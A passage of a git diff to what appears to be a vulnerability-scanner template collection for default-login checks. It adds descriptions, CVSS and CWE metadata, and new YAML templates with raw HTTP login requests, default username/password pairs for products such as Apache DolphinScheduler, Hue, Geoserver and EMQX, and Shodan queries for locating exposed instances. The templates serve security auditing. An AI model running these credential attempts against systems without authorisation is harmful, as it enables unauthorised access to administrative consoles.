- vgnadmin + - author + - anonymous + - jdoe@geometrixx.info + - aparker@geometrixx.info aem_pass: - admin - password - replication-receiver - vgnadmin + - author + - anonymous + - jdoe + - aparker stop-at-first-match: true matchers-condition: and @@ -40,7 +57,9 @@ requests: - type: word part: header - condition: and words: - login-token - crx.default + condition: and + +# Enhanced by mp on 2022/03/23 diff --git a/default-logins/alibaba/canal-default-login.yaml b/default-logins/alibaba/canal-default-login.yaml index a4c4a1b801..d9b73d5898 100644 --- a/default-logins/alibaba/canal-default-login.yaml +++ b/default-logins/alibaba/canal-default-login.yaml @@ -4,6 +4,13 @@ info: name: Alibaba Canal Default Login author: pdteam severity: high + description: An Alibaba Canal default login was discovered. + reference: + - https://github.com/alibaba/canal/wiki/ClientAdapter + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: alibaba,default-login requests: @@ -33,3 +40,5 @@ requests: words: - 'data":{"token"' - '"code":20000' + +# Enhanced by mp on 2022/03/22 diff --git a/default-logins/alphaweb/alphaweb-default-login.yaml b/default-logins/alphaweb/alphaweb-default-login.yaml index 6532087439..6a48f18c6e 100644 --- a/default-logins/alphaweb/alphaweb-default-login.yaml +++ b/default-logins/alphaweb/alphaweb-default-login.yaml @@ -4,8 +4,14 @@ info: name: AlphaWeb XE Default Login author: Lark Lab severity: medium - tags: default-login - reference: https://wiki.zenitel.com/wiki/AlphaWeb + description: An AlphaWeb XE default login was discovered. + reference: + - https://wiki.zenitel.com/wiki/AlphaWeb + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 + tags: default-login,AlphaWeb requests: - raw: @@ -32,4 +38,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/22 diff --git a/default-logins/ambari/ambari-default-login.yaml b/default-logins/ambari/ambari-default-login.yaml index 6bb9c6de1a..b23093118b 100644 --- a/default-logins/ambari/ambari-default-login.yaml +++ b/default-logins/ambari/ambari-default-login.yaml @@ -3,8 +3,15 @@ id: ambari-default-login info: name: Apache Ambari Default Login author: pdteam - severity: medium - tags: ambari,default-login + severity: high + description: An Apache Ambari default admin login was discovered. + reference: + - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: ambari,default-login,apache requests: - raw: @@ -23,4 +30,6 @@ requests: words: - '"Users" : {' - 'AMBARI.' - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/default-logins/apache/airflow-default-login.yaml b/default-logins/apache/airflow-default-login.yaml index 6b84d33a88..772e1ffd78 100644 --- a/default-logins/apache/airflow-default-login.yaml +++ b/default-logins/apache/airflow-default-login.yaml @@ -3,11 +3,17 @@ id: airflow-default-login info: name: Apache Airflow Default Login author: pdteam - severity: critical - tags: airflow,default-login - reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html + severity: high + description: An Apache Airflow default login was discovered. + reference: + - https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: shodan-query: title:"Sign In - Airflow" + tags: airflow,default-login,apache requests: - raw: @@ -53,4 +59,6 @@ requests: - type: word words: - - 'You should be redirected automatically to target URL: <a href="/">' \ No newline at end of file + - 'You should be redirected automatically to target URL: <a href="/">' + +# Enhanced by mp on 2022/03/22 diff --git a/default-logins/apache/apisix-default-login.yaml b/default-logins/apache/apisix-default-login.yaml new file mode 100644 index 0000000000..d89104b847 --- /dev/null +++ b/default-logins/apache/apisix-default-login.yaml @@ -0,0 +1,51 @@ +id: apisix-default-login + +info: + name: Apache Apisix Default Admin Login + author: pdteam + severity: high + description: An Apache Apisix default admin login was discovered. + reference: + - https://apisix.apache.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: title:"Apache APISIX Dashboard" + fofa-query: title="Apache APISIX Dashboard" + product: https://apisix.apache.org + tags: apisix,apache,default-login + +requests: + - raw: + - | + POST /apisix/admin/user/login HTTP/1.1 + Host: {{Hostname}} + Accept: application/json + Authorization: + Content-Type: application/json;charset=UTF-8 + + {"username":"{{user}}","password":"{{pass}}"} + + attack: pitchfork + payloads: + user: + - admin + pass: + - admin + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '"data"' + - '"token"' + - '"code":0' + condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/default-logins/apache/dolphinscheduler-default-login.yaml b/default-logins/apache/dolphinscheduler-default-login.yaml new file mode 100644 index 0000000000..e52b6c717a --- /dev/null +++ b/default-logins/apache/dolphinscheduler-default-login.yaml @@ -0,0 +1,47 @@ +id: dolphinscheduler-default-login + +info: + name: Apache DolphinScheduler Default Login + author: For3stCo1d + severity: high + description: Apache DolphinScheduler default admin credentials were discovered. + reference: + - https://github.com/apache/dolphinscheduler + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: http.title:"DolphinScheduler" + tags: apache,dolphinscheduler,default-login,oss + +requests: + - raw: + - | + POST /dolphinscheduler/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + userName={{user}}&userPassword={{pass}} + + attack: pitchfork + payloads: + user: + - admin + pass: + - dolphinscheduler123 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"msg":"login success"' + - '"sessionId":' + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/28 diff --git a/default-logins/apache/dubbo-admin-default-login.yaml b/default-logins/apache/dubbo-admin-default-login.yaml new file mode 100644 index 0000000000..0ed4d68121 --- /dev/null +++ b/default-logins/apache/dubbo-admin-default-login.yaml @@ -0,0 +1,39 @@ +id: dubbo-admin-default-login + +info: + name: Dubbo Admin Default Login + author: ritikchaddha + severity: high + reference: + - https://www.cnblogs.com/wishwzp/p/9438658.html + tags: dubbo,apache,default-login + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Authorization: Basic {{base64(username + ':' + password)}} + + attack: pitchfork + payloads: + username: + - guest + - root + password: + - guest + - root + + matchers-condition: and + matchers: + - type: word + words: + - "<title>Dubbo Admin" + - "/sysinfo/versions" + - "{{username}}', '/logout')" + condition: and + + - type: status + status: + - 200 diff --git a/default-logins/apache/kafka-center-default-login.yaml b/default-logins/apache/kafka-center-default-login.yaml new file mode 100644 index 0000000000..0863274a69 --- /dev/null +++ b/default-logins/apache/kafka-center-default-login.yaml @@ -0,0 +1,47 @@ +id: kafka-center-default-login + +info: + name: Apache Kafka Center Default Login + author: dhiyaneshDK + severity: high + description: Apache Kafka Center default admin credentials were discovered. + reference: + - https://developer.ibm.com/tutorials/kafka-authn-authz/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: http.title:"Kafka Center" + tags: kafka,default-login + +requests: + - raw: + - | + POST /login/system HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name":"{{username}}","password":"{{password}}","checkbox":false} + + attack: pitchfork + payloads: + username: + - admin + password: + - admin + + matchers-condition: and + matchers: + + - type: word + words: + - '"code":200' + - '"name":"admin"' + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/apache/ranger-default-login.yaml b/default-logins/apache/ranger-default-login.yaml new file mode 100644 index 0000000000..5edd99329e --- /dev/null +++ b/default-logins/apache/ranger-default-login.yaml @@ -0,0 +1,39 @@ +id: ranger-default-login + +info: + name: Apache Ranger Default Login + author: For3stCo1d + severity: high + reference: https://github.com/apache/ranger + metadata: + shodan-query: http.title:"Ranger - Sign In" + tags: apache,ranger,default-login + +requests: + - raw: + - | + POST /login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + username={{user}}&password={{pass}} + + attack: pitchfork + payloads: + user: + - admin + pass: + - admin + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"statusCode":200' + - '"msgDesc":"Login Successful"' + condition: and + + - type: status + status: + - 200 diff --git a/default-logins/apache/tomcat-default-login.yaml b/default-logins/apache/tomcat-default-login.yaml index 9b4556e810..5beb8f24ea 100644 --- a/default-logins/apache/tomcat-default-login.yaml +++ b/default-logins/apache/tomcat-default-login.yaml @@ -1,8 +1,12 @@ id: tomcat-default-login + info: - name: Tomcat Manager Default Login + name: ApahceTomcat Manager Default Login author: pdteam severity: high + description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations. + reference: + - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/ tags: tomcat,apache,default-login requests: @@ -57,10 +61,16 @@ requests: matchers-condition: and matchers: + - type: word + part: body + words: + - "Apache Tomcat" + - "Server Information" + - "Hostname" + condition: and + - type: status status: - 200 - - type: word - words: - - Apache Tomcat \ No newline at end of file +# Enhanced by mp on 2022/03/03 diff --git a/default-logins/apollo/apollo-default-login.yaml b/default-logins/apollo/apollo-default-login.yaml new file mode 100644 index 0000000000..c9e119d097 --- /dev/null +++ b/default-logins/apollo/apollo-default-login.yaml @@ -0,0 +1,57 @@ +id: apollo-default-login + +info: + name: Apollo Default Login + author: PaperPen + severity: high + description: An Apollo default login was discovered. + reference: + - https://github.com/apolloconfig/apollo + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: http.favicon.hash:11794165 + tags: apollo,default-login + +requests: + - raw: + - | + POST /signin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Origin: {{BaseURL}} + Referer: {{BaseURL}}/signin? + + username={{user}}&password={{pass}}&login-submit=Login + + - | + GET /user HTTP/1.1 + Host: {{Hostname}} + + attack: pitchfork + payloads: + user: + - apollo + pass: + - admin + + cookie-reuse: true + req-condition: true + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - '"userId":' + - '"email":' + condition: or + + - type: dsl + dsl: + - "status_code_1 == 302 && status_code_2 == 200" + - "contains(tolower(all_headers_2), 'application/json')" + condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/default-logins/arl/arl-default-login.yaml b/default-logins/arl/arl-default-login.yaml index a7c16e40a9..f5dcf2d27b 100644 --- a/default-logins/arl/arl-default-login.yaml +++ b/default-logins/arl/arl-default-login.yaml @@ -1,9 +1,14 @@ id: arl-default-login info: - name: ARL Default Login + name: ARL Default Admin Login author: pikpikcu severity: high + description: An ARL default admin login was discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: arl,default-login requests: @@ -35,3 +40,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/22 diff --git a/default-logins/axis2/axis2-default-login.yaml b/default-logins/axis2/axis2-default-login.yaml deleted file mode 100644 index db69d4767f..0000000000 --- a/default-logins/axis2/axis2-default-login.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: axis2-default-login - -info: - name: Axis2 Default Login - author: pikpikcu - severity: high - tags: axis,apache,default-login - -requests: - - raw: - - | - POST /axis2-admin/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - loginUsername={{username}}&loginPassword={{password}} - - - | - POST /axis2/axis2-admin/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - userName={{username}}&password={{password}}&submit=+Login+ - - payloads: - username: - - admin - password: - - axis2 - attack: pitchfork - - matchers-condition: and - matchers: - - - type: word - words: - - "

Welcome to Axis2 Web Admin Module !!

" - - - type: status - status: - - 200 diff --git a/default-logins/azkaban/azkaban-default-login.yaml b/default-logins/azkaban/azkaban-default-login.yaml index 5d9e13ca58..c524be5d45 100644 --- a/default-logins/azkaban/azkaban-default-login.yaml +++ b/default-logins/azkaban/azkaban-default-login.yaml @@ -1,47 +1,53 @@ -id: azkaban-default-login - -info: - name: Azkaban Web Client Default Credential - author: pussycat0x - severity: high - reference: https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22 - tags: default-login,azkaban - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - action=login&username={{username}}&password={{password}} - - payloads: - username: - - admin - password: - - admin - attack: pitchfork - matchers-condition: and - matchers: - - type: word - words: - - '"session.id"' - - '"success"' - condition: and - - - type: word - words: - - 'azkaban.browser.session.id' - - 'application/json' - condition: and - part: header - - - type: status - status: - - 200 - - extractors: - - type: kval - kval: - - azkaban.browser.session.id +id: azkaban-default-login + +info: + name: Azkaban Web Client Default Credential + author: pussycat0x + severity: high + description: Azkaban is a batch workflow job scheduler created at LinkedIn to run Hadoop jobs. Default web client credentials were discovered. + reference: + - https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22 + classification: + cwe-id: CWE-798 + tags: default-login,azkaban + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + action=login&username={{username}}&password={{password}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork + matchers-condition: and + matchers: + - type: word + words: + - '"session.id"' + - '"success"' + condition: and + + - type: word + words: + - 'azkaban.browser.session.id' + - 'application/json' + condition: and + part: header + + - type: status + status: + - 200 + + extractors: + - type: kval + kval: + - azkaban.browser.session.id + +# Enhanced by mp on 2022/03/03 diff --git a/default-logins/chinaunicom/chinaunicom-default-login.yaml b/default-logins/chinaunicom/chinaunicom-default-login.yaml index 9b69089ffb..f4df076f63 100644 --- a/default-logins/chinaunicom/chinaunicom-default-login.yaml +++ b/default-logins/chinaunicom/chinaunicom-default-login.yaml @@ -1,9 +1,12 @@ id: chinaunicom-default-login info: - name: Chinaunicom Modem Default Login + name: China Unicom Modem Default Login author: princechaddha severity: high + description: Default login credentials were discovered for a China Unicom modem. + classification: + cwe-id: CWE-798 tags: chinaunicom,default-login requests: @@ -31,3 +34,5 @@ requests: words: - "/menu.gch" part: header + +# Enhanced by mp on 2022/03/03 diff --git a/default-logins/cobbler/cobbler-default-login.yaml b/default-logins/cobbler/cobbler-default-login.yaml new file mode 100644 index 0000000000..2cfe8ba153 --- /dev/null +++ b/default-logins/cobbler/cobbler-default-login.yaml @@ -0,0 +1,72 @@ +id: cobbler-default-login + +info: + name: Cobbler Default Login + author: c-sh0 + severity: high + description: Cobbler default login credentials for the testing module (testing/testing) were discovered. + reference: + - https://seclists.org/oss-sec/2022/q1/146 + - https://github.com/cobbler/cobbler/issues/2307 + - https://github.com/cobbler/cobbler/issues/2909 + classification: + cwe-id: CWE-798 + tags: cobbler,default-login,api + +requests: + - raw: + - | + POST {{BaseURL}}/cobbler_api HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + + + + login + + + + {{username}} + + + + + {{password}} + + + + + + attack: pitchfork + payloads: + username: + - cobbler + - testing + password: + - cobbler + - testing + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - 'text/xml' + + - type: dsl + dsl: + - "!contains(tolower(body), 'faultCode')" + - "!contains(tolower(body), 'login failed')" + condition: or + + - type: regex + part: body + regex: + - "(.*[a-zA-Z0-9].+==)" + +# Enhanced by mp on 2022/03/03 diff --git a/default-logins/cobbler/hue-default-credential.yaml b/default-logins/cobbler/hue-default-credential.yaml new file mode 100644 index 0000000000..d1490c1eb0 --- /dev/null +++ b/default-logins/cobbler/hue-default-credential.yaml @@ -0,0 +1,70 @@ +id: hue-default-credential + +info: + name: Cloudera Hue Default Admin Login + author: For3stCo1d + severity: high + description: Cloudera Hue default admin credentials were discovered. + reference: + - https://github.com/cloudera/hue + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: title:"Hue - Welcome to Hue" + tags: hue,default-login,oss,cloudera + +requests: + - raw: + - | + GET /hue/accounts/login?next=/ HTTP/1.1 + Host: {{Hostname}} + + - | + POST /hue/accounts/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username={{user}}&password={{pass}}&next=%2F + + attack: pitchfork + payloads: + user: + - admin + - hue + - hadoop + - cloudera + + pass: + - admin + - hue + - hadoop + - cloudera + + cookie-reuse: true + extractors: + - type: regex + name: csrfmiddlewaretoken + part: body + internal: true + group: 1 + regex: + - name='csrfmiddlewaretoken' value='(.+?)' + + req-condition: true + stop-at-first-match: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - contains(tolower(body_1), 'welcome to hue') + - contains(tolower(all_headers_2), 'csrftoken=') + - contains(tolower(all_headers_2), 'sessionid=') + condition: and + + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/28 diff --git a/default-logins/dell/dell-idrac-default-login.yaml b/default-logins/dell/dell-idrac-default-login.yaml index 6e06c1ace2..5629d90f41 100644 --- a/default-logins/dell/dell-idrac-default-login.yaml +++ b/default-logins/dell/dell-idrac-default-login.yaml @@ -1,8 +1,14 @@ id: dell-idrac-default-login + info: - name: Dell iDRAC6/7/8 Default login + name: Dell iDRAC6/7/8 Default Login author: kophjager007 severity: high + description: Dell iDRAC6/7/8 default login information was discovered. The default iDRAC username and password are widely known, and any user with access to the server could change the default password. + reference: + - https://securityforeveryone.com/tools/dell-idrac6-7-8-default-login-scanner + classification: + cwe-id: CWE-798 tags: dell,idrac,default-login requests: @@ -34,3 +40,5 @@ requests: - type: word words: - '0' + +# Enhanced by mp on 2022/03/03 diff --git a/default-logins/dell/dell-idrac9-default-login.yaml b/default-logins/dell/dell-idrac9-default-login.yaml index d60325405b..ff09878538 100644 --- a/default-logins/dell/dell-idrac9-default-login.yaml +++ b/default-logins/dell/dell-idrac9-default-login.yaml @@ -4,6 +4,11 @@ info: name: DELL iDRAC9 Default Login author: kophjager007,milo2012 severity: high + description: DELL iDRAC9 default login information was discovered. The default iDRAC username and password are widely known, and any user with access to the server could change the default password. + reference: + - https://www.dell.com/support/kbdoc/en-us/000177787/how-to-change-the-default-login-password-of-the-idrac-9 + classification: + cwe-id: cwe-798 tags: dell,idrac,default-login requests: @@ -33,3 +38,5 @@ requests: part: body words: - '"authResult":0' + +# Enhanced by mp on 2022/03/03 diff --git a/default-logins/dell/emcecom-default-login.yaml b/default-logins/dell/emcecom-default-login.yaml index c7d78156d9..7ec4aff9bc 100644 --- a/default-logins/dell/emcecom-default-login.yaml +++ b/default-logins/dell/emcecom-default-login.yaml @@ -4,8 +4,13 @@ info: name: Dell EMC ECOM Default Login author: Techryptic (@Tech) severity: high - description: Default Login of admin:#1Password on Dell EMC ECOM application. - reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation + description: Dell EMC ECOM default login information "(admin:#1Password)" was discovered. + reference: + - https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation + classification: + cwe-id: CWE-798 + remediation: To resolve this issue, perform a "remsys" and "addsys" with no other operations occurring (reference the appropriate SMI-S provider documentation) and specify the new password when re-adding the array. + If there are issues performing the "addsys" operation, it is recommended to restart the management server on each SP. tags: dell,emc,ecom,default-login requests: @@ -35,4 +40,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/03 diff --git a/default-logins/digitalrebar/digitalrebar-default-login.yaml b/default-logins/digitalrebar/digitalrebar-default-login.yaml new file mode 100644 index 0000000000..96c5a273d5 --- /dev/null +++ b/default-logins/digitalrebar/digitalrebar-default-login.yaml @@ -0,0 +1,49 @@ +id: digitalrebar-default-login + +info: + name: RackN Digital Rebar Default Login + author: c-sh0 + severity: high + description: A RackN Digital Rebar default login was discovered. + reference: + - https://docs.rackn.io/en/latest/doc/faq-troubleshooting.html?#what-are-the-default-passwords + - https://rackn.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: rackn,digitalrebar,default-login + +requests: + - raw: + - | + GET /api/v3/users HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + + payloads: + username: + - rocketskates + password: + - r0cketsk8ts + + attack: pitchfork + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + part: header + regex: + - '(?i)(X-Drp-)' + + - type: word + part: body + words: + - 'Name' + - 'Secret' + condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/default-logins/druid/druid-default-login.yaml b/default-logins/druid/druid-default-login.yaml index 78d252b867..6f81354021 100644 --- a/default-logins/druid/druid-default-login.yaml +++ b/default-logins/druid/druid-default-login.yaml @@ -1,9 +1,12 @@ id: druid-default-login info: - name: Druid Default Login + name: Apache Druid Default Login author: pikpikcu severity: high + description: Apache Druid default login information (admin/admin) was discovered. + classification: + cwe-id: CWE-798 tags: druid,default-login requests: @@ -36,4 +39,6 @@ requests: - type: regex regex: - - "^success$" \ No newline at end of file + - "^success$" + +# Enhanced by mp on 2022/03/03 diff --git a/default-logins/dvwa/dvwa-default-login.yaml b/default-logins/dvwa/dvwa-default-login.yaml index 941c2c30d0..fdf974e494 100644 --- a/default-logins/dvwa/dvwa-default-login.yaml +++ b/default-logins/dvwa/dvwa-default-login.yaml @@ -1,8 +1,14 @@ id: dvwa-default-login + info: name: DVWA Default Login author: pdteam severity: critical + description: Damn Vulnerable Web App (DVWA) is a test application for security professionals. The hard coded credentials are part of a security testing scenario. + reference: + - https://opensourcelibs.com/lib/dvwa + classification: + cwe-id: CWE-798 tags: dvwa,default-login requests: @@ -50,3 +56,5 @@ requests: - type: word words: - "You have logged in as 'admin'" + +# Enhanced by mp on 2022/03/03 diff --git a/default-logins/emqx/emqx-default-login.yaml b/default-logins/emqx/emqx-default-login.yaml new file mode 100644 index 0000000000..5b55f228e5 --- /dev/null +++ b/default-logins/emqx/emqx-default-login.yaml @@ -0,0 +1,39 @@ +id: emqx-default-login + +info: + name: Emqx Default Admin Login + author: For3stCo1d + severity: high + description: Emqx default admin credentials were discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: http.favicon.hash:"-670975485" + tags: emqx,default-login + +requests: + - raw: + - | + POST /api/v4/auth HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + {"username":"{{user}}","password":"{{pass}}"} + + attack: pitchfork + payloads: + user: + - admin + pass: + - public + + matchers: + - type: dsl + dsl: + - body == "{\"code\":0}" + - status_code == 200 + condition: and + +# Enhanced by mp on 2022/03/28 diff --git a/default-logins/exacqvision/exacqvision-default-login.yaml b/default-logins/exacqvision/exacqvision-default-login.yaml index e04d3a0f7f..35653b963d 100644 --- a/default-logins/exacqvision/exacqvision-default-login.yaml +++ b/default-logins/exacqvision/exacqvision-default-login.yaml @@ -4,8 +4,12 @@ info: name: ExacqVision Default Login author: ELSFA7110 severity: high + description: ExacqVision Web Service default login credentials (admin/admin256) were discovered. + reference: + - https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf + classification: + cwe-id: cwe-798 tags: exacqvision,default-login - reference: https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf requests: - raw: @@ -41,3 +45,5 @@ requests: words: - '"auth":' - '"success": true' + +# Enhanced by mp on 2022/03/03 diff --git a/default-logins/flir/flir-default-login.yaml b/default-logins/flir/flir-default-login.yaml index 9cb112ad91..4ac5b71758 100644 --- a/default-logins/flir/flir-default-login.yaml +++ b/default-logins/flir/flir-default-login.yaml @@ -4,6 +4,11 @@ info: name: Flir Default Login author: pikpikcu severity: medium + description: Flir default login credentials (admin/admin) were discovered. + reference: + - https://securitycamcenter.com/flir-default-password/ + classification: + cwe-id: CWE-798 tags: default-login,flir,camera,iot requests: @@ -41,3 +46,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/03 diff --git a/default-logins/frps/frp-default-login.yaml b/default-logins/frps/frp-default-login.yaml index 2dc240d633..4ee9aa6cbd 100644 --- a/default-logins/frps/frp-default-login.yaml +++ b/default-logins/frps/frp-default-login.yaml @@ -1,11 +1,15 @@ id: frp-default-login info: - name: Frp Default Login + name: FRP Default Login author: pikpikcu severity: high + description: FRP default login credentials were discovered. + reference: + - https://github.com/fatedier/frp/issues/1840 + classification: + cwe-id: CWE-798 tags: frp,default-login - reference: https://github.com/fatedier/frp/issues/1840 requests: - raw: @@ -33,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/03 diff --git a/default-logins/fuelcms/fuelcms-default-login.yaml b/default-logins/fuelcms/fuelcms-default-login.yaml new file mode 100644 index 0000000000..c46140539c --- /dev/null +++ b/default-logins/fuelcms/fuelcms-default-login.yaml @@ -0,0 +1,56 @@ +id: fuelcms-default-login + +info: + name: Fuel CMS Default Credentials + author: Adam Crosser + severity: high + description: Fuel CMS default admin credentials were discovered. + reference: + - https://docs.getfuelcms.com/general/security + tags: fuelcms,default-login,oss + +requests: + - raw: + - | + GET /fuel/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /fuel/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user_name={{username}}&password={{password}}&Login=Login&forward=&ci_csrf_token_FUEL={{csrftoken}} + + attack: pitchfork + payloads: + username: + - admin + password: + - admin + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: header + words: + - "/fuel/dashboard" + + - type: regex + part: header + regex: + - 'fuel_(.*)=' + + - type: status + status: + - 302 + + extractors: + - type: regex + part: body + name: csrftoken + internal: true + group: 1 + regex: + - 'id="ci_csrf_token_FUEL" value="([0-9a-z]+)" \/>' diff --git a/default-logins/geoserver/geoserver-default-login.yaml b/default-logins/geoserver/geoserver-default-login.yaml new file mode 100644 index 0000000000..8a9e8d01ec --- /dev/null +++ b/default-logins/geoserver/geoserver-default-login.yaml @@ -0,0 +1,46 @@ +id: geoserver-default-login + +info: + name: Geoserver Default Admin Login + author: For3stCo1d + severity: high + description: Geoserver default admin credentials were discovered. + reference: + - http://geoserver.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + fofa-query: app="GeoServer" + tags: geoserver,default-login + +requests: + - raw: + - | + POST /geoserver/j_spring_security_check HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{user}}&password={{pass}} + + attack: pitchfork + payloads: + user: + - admin + pass: + - geoserver + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "contains(tolower(location), '/geoserver/web')" + - "!contains(tolower(location), 'error=true')" + condition: and + + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/28 diff --git a/default-logins/gitlab/gitlab-weak-login.yaml b/default-logins/gitlab/gitlab-weak-login.yaml index 585f8d1bab..d2bdd5eafe 100644 --- a/default-logins/gitlab/gitlab-weak-login.yaml +++ b/default-logins/gitlab/gitlab-weak-login.yaml @@ -1,18 +1,18 @@ id: gitlab-weak-login info: - name: Gitlab Weak Login + name: Gitlab Default Login author: Suman_Kar,dwisiswant0 severity: high - tags: gitlab,default-login + description: Gitlab default login credentials were discovered. reference: - https://twitter.com/0xmahmoudJo0/status/1467394090685943809 - https://git-scm.com/book/en/v2/Git-on-the-Server-GitLab + classification: + cwe-id: CWE-798 metadata: shodan-query: http.title:"GitLab" - - # Gitlab blocks for 10 minutes after 5 "Invalid" attempts for valid user. - # So make sure, not to attempt more than 4 password for same valid user. + tags: gitlab,default-login requests: - raw: @@ -53,4 +53,6 @@ requests: - '"access_token":' - '"token_type":' - '"refresh_token":' - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/03 diff --git a/default-logins/glpi/glpi-default-login.yaml b/default-logins/glpi/glpi-default-login.yaml index c2ea4c26d7..743d3b25d8 100644 --- a/default-logins/glpi/glpi-default-login.yaml +++ b/default-logins/glpi/glpi-default-login.yaml @@ -4,9 +4,12 @@ info: name: GLPI Default Login author: andysvints severity: high + description: GLPI default login credentials were discovered. GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled. + reference: + - https://glpi-project.org/ + classification: + cwe-id: CWE-798 tags: glpi,default-login - description: GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled. - reference: https://glpi-project.org/ requests: - raw: @@ -65,3 